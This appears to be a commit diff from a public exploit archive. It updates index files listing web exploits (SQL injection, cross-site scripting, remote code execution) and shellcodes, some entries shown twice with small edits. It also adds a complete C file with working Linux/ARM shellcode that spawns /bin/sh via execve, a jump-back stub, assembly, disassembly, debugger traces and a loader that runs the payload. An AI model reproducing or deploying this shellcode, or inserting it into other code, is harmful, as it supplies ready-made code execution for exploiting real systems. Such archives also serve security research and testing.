44940,exploits/php/webapps/44940.txt,"WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection",2018-06-25,"Bhushan B. Patil",webapps,php,80
44952,exploits/php/webapps/44952.html,"BEESCMS 4.0 - Cross-Site Request Forgery (Add Admin)",2018-06-28,bay0net,webapps,php,80
44953,exploits/php/webapps/44953.txt,"HongCMS 3.0.0 - SQL Injection",2018-06-28,Hzllaga,webapps,php,
44953,exploits/php/webapps/44953.txt,"HongCMS 3.0.0 - (Authenticated) SQL Injection",2018-06-28,Hzllaga,webapps,php,
44954,exploits/php/webapps/44954.txt,"hycus CMS 1.0.4 - Authentication Bypass",2018-06-28,"Berk Dusunur",webapps,php,
44955,exploits/hardware/webapps/44955.txt,"DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting",2018-06-28,"Adipta Basu",webapps,hardware,80
44956,exploits/hardware/webapps/44956.py,"Cisco Adaptive Security Appliance - Path Traversal",2018-06-28,"Yassine Aboukir",webapps,hardware,
@ -39972,5 +39977,6 @@ id,file,description,date,author,type,platform,port
45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
45409,exploits/linux/webapps/45409.rb,"Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)",2018-09-14,"Stephen Shkardoon",webapps,linux,443
45411,exploits/php/webapps/45411.txt,"Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection",2018-09-14,"Ceylan BOZOĞULLARINDAN",webapps,php,80
45422,exploits/hardware/webapps/45422.txt,"Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting",2018-09-17,cakes,webapps,hardware,
45422,exploits/hardware/webapps/45422.txt,"Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting",2018-09-17,cakes,webapps,hardware,80
45423,exploits/php/webapps/45423.txt,"Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection",2018-09-17,"Hamza Megahed",webapps,php,
45434,exploits/php/webapps/45434.txt,"WordPress Plugin Arigato Autoresponder and Newsletter 2.5 - Blind SQL Injection / Reflected Cross-Site Scripting",2018-09-18,"Larry W. Cashdollar",webapps,php,80

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -912,3 +912,4 @@ id,file,description,date,author,type,platform
45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
45418,shellcodes/linux_x86/45418.c,"Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
45426,shellcodes/arm/45426.c,"Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes)",2018-09-18,"Ken Kitahara",shellcode,arm

1 id file description date author type platform
912 45416 shellcodes/linux_x86/45416.c Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes) 2018-09-14 Ray Doyle shellcode linux_x86
913 45417 shellcodes/linux_x86/45417.c Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes) 2018-09-14 Ray Doyle shellcode linux_x86
914 45418 shellcodes/linux_x86/45418.c Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes) 2018-09-14 Ray Doyle shellcode linux_x86
915 45426 shellcodes/arm/45426.c Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes) 2018-09-18 Ken Kitahara shellcode arm

226
shellcodes/arm/45426.c Normal file
View file

@ -0,0 +1,226 @@
/*
# Title: Linux/ARM - Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode (4 Bytes)
# Date: 2018-09-18
# Author: Ken Kitahara
# Tested: armv7l (Raspberry Pi 3 Model B+)
[System Information]
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $
[Shellcode]
(1) Use "eor r7, r7, r7" Shellcode as Padding Shellcode (4 Bytes)
pi@raspberrypi:~ $ cat padding.s
.section .text
.global _start
_start:
eor r7, r7, r7
pi@raspberrypi:~ $ as -o padding.o padding.s && ld -N -o padding padding.o
pi@raspberrypi:~ $ objdump -d ./padding
./padding: file format elf32-littlearm
Disassembly of section .text:
00010054 <_start>:
10054: e0277007 eor r7, r7, r7
pi@raspberrypi:~ $
(2) execve("/bin/sh", NULL, NULL) Shellcode (27 Bytes)
pi@raspberrypi:~ $ cat shell.s
.section .text
.global _start
_start:
.ARM
add r3, pc, #1
bx r3
.THUMB
// execve("/bin/sh", NULL, NULL)
adr r0, spawn
eor r1, r1, r1
eor r2, r2, r2
strb r2, [r0, #endline-spawn]
mov r7, #11
svc #1
spawn:
.ascii "/bin/sh"
endline:
pi@raspberrypi:~ $ as -o shell.o shell.s && ld -N -o shell shell.o
pi@raspberrypi:~ $ objdump -d ./shell
./shell: file format elf32-littlearm
Disassembly of section .text:
00010054 <_start>:
10054: e28f3001 add r3, pc, #1
10058: e12fff13 bx r3
1005c: a002 add r0, pc, #8 ; (adr r0, 10068 <spawn>)
1005e: 4049 eors r1, r1
10060: 4052 eors r2, r2
10062: 71c2 strb r2, [r0, #7]
10064: 270b movs r7, #11
10066: df01 svc 1
00010068 <spawn>:
10068: 6e69622f .word 0x6e69622f
1006c: 732f .short 0x732f
1006e: 68 .byte 0x68
0001006f <endline>:
...
pi@raspberrypi:~ $ ./shell
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
$ exit
pi@raspberrypi:~ $
(3) Jump Back Shellcode (4 Bytes)
pi@raspberrypi:~ $ cat jmpback.s
.section .text
.global _start
_start:
// Jump back 0x30 bytes from _start address.
sub pc, pc, #0x30+0x08
pi@raspberrypi:~ $ as -o jmpback.o jmpback.s && ld -N -o jmpback jmpback.o
pi@raspberrypi:~ $ objdump -d ./jmpback
./jmpback: file format elf32-littlearm
Disassembly of section .text:
00010054 <_start>:
10054: e24ff038 sub pc, pc, #56 ; 0x38
pi@raspberrypi:~ $
[Operation Test]
pi@raspberrypi:~ $ ./loader
Shellcode Length: 4
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
$ exit
pi@raspberrypi:~ $ gdb -q ./loader
GEF for linux ready, type `gef' to start, `gef config' to configure
69 commands loaded for GDB 7.12.0.20161007-git using Python engine 3.5
[*] 1 commands could not be loaded, run `gef missing` to know why.
Reading symbols from ./loader...(no debugging symbols found)...done.
gef disass main
Dump of assembler code for function main:
0x00010470 <+0>: push {r11, lr}
0x00010474 <+4>: add r11, sp, #4
0x00010478 <+8>: sub sp, sp, #8
0x0001047c <+12>: ldr r0, [pc, #44] ; 0x104b0 <main+64>
0x00010480 <+16>: bl 0x10330 <strlen@plt>
0x00010484 <+20>: mov r3, r0
0x00010488 <+24>: mov r1, r3
0x0001048c <+28>: ldr r0, [pc, #32] ; 0x104b4 <main+68>
0x00010490 <+32>: bl 0x1030c <printf@plt>
0x00010494 <+36>: ldr r3, [pc, #20] ; 0x104b0 <main+64>
0x00010498 <+40>: str r3, [r11, #-8]
0x0001049c <+44>: ldr r3, [r11, #-8]
0x000104a0 <+48>: blx r3
0x000104a4 <+52>: nop ; (mov r0, r0)
0x000104a8 <+56>: sub sp, r11, #4
0x000104ac <+60>: pop {r11, pc}
0x000104b0 <+64>: andeq r1, r2, r8, rrx
0x000104b4 <+68>: andeq r0, r1, r8, lsr #10
End of assembler dump.
gef b *main+48
Breakpoint 1 at 0x104a0
gef r
Starting program: /home/pi/loader
Shellcode Length: 4
--snip--
Breakpoint 1, 0x000104a0 in main ()
gef si
--snip--
[ code:arm ]
0x2105c <shell+48> svcle 0x0001270b
0x21060 <shell+52> cdpvs 2, 6, cr6, cr9, cr15, {1}
0x21064 <shell+56> rsbeq r7, r8, pc, lsr #6
0x21068 <sc+0> sub pc, pc, #56 ; 0x38
0x2106c <sc+4> andeq r0, r0, r0
--snip--
gef i r pc
pc 0x21068 0x21068 <sc>
gef si
--snip--
[ code:arm ]
0x2102c <shell+0> eor r7, r7, r7
0x21030 <shell+4> eor r7, r7, r7
0x21034 <shell+8> eor r7, r7, r7
0x21038 <shell+12> eor r7, r7, r7
0x2103c <shell+16> eor r7, r7, r7
0x21040 <shell+20> eor r7, r7, r7
--snip--
gef i r pc
pc 0x21038 0x21038 <shell+12>
gef c
Continuing.
process 968 is executing new program: /bin/dash
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
$ exit
[Inferior 1 (process 968) exited normally]
gef q
pi@raspberrypi:~ $
*/
#include<stdio.h>
#include<string.h>
unsigned char shell[] = \
// Use "eor r7, r7, r7" Shellcode as Padding Shellcode (4 Bytes * 8)
"\x07\x70\x27\xe0\x07\x70\x27\xe0"
"\x07\x70\x27\xe0\x07\x70\x27\xe0"
"\x07\x70\x27\xe0\x07\x70\x27\xe0"
"\x07\x70\x27\xe0\x07\x70\x27\xe0"
// execve("/bin/sh", NULL, NULL) Shellcode (27 Bytes)
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
"\x02\xa0\x49\x40\x52\x40\xc2\x71"
"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
"\x2f\x73\x68";
// Jump Back Shellcode (4 Bytes)
unsigned char sc[] = \
"\x38\xf0\x4f\xe2";
void main()
{
printf("Shellcode Length: %d\n", strlen(sc));
int (*ret)() = (int(*)())sc;
ret();
}